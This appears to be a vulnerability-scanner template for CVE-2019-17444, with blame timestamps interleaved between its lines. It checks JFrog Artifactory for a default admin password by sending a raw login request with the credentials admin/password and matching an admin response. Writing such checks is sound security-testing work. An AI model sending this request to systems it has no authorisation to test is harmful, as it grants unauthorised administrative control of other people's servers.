2022-04-15 08:07:49 +00:00
id : CVE-2019-17444
info :
2022-05-16 14:56:18 +00:00
name : Jfrog Artifactory <6.17.0 - Default Admin Password
2022-04-22 10:38:41 +00:00
author : pdteam
2022-04-15 08:07:49 +00:00
severity : critical
description : |
2022-05-16 19:28:28 +00:00
Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
2022-04-15 08:07:49 +00:00
reference :
- https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes
- https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory
- https://nvd.nist.gov/vuln/detail/CVE-2019-17444
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-04-15 08:07:49 +00:00
cve-id : CVE-2019-17444
cwe-id : CWE-521
tags : cve,cve2019,jfrog,default-login
requests :
- raw :
- |
POST /ui/api/v1/ui/auth/login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json;charset=UTF-8
X-Requested-With : XMLHttpRequest
Origin : {{RootURL}}
{"user" : "admin" , "password" : "password" , "type" : "login" }
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"name":"admin"'
- '"admin":true'
2022-05-16 14:56:18 +00:00
condition : and
2022-05-17 06:25:20 +00:00
- type : status
status :
- 200
2022-05-16 14:56:18 +00:00
# Enhanced by mp on 2022/05/16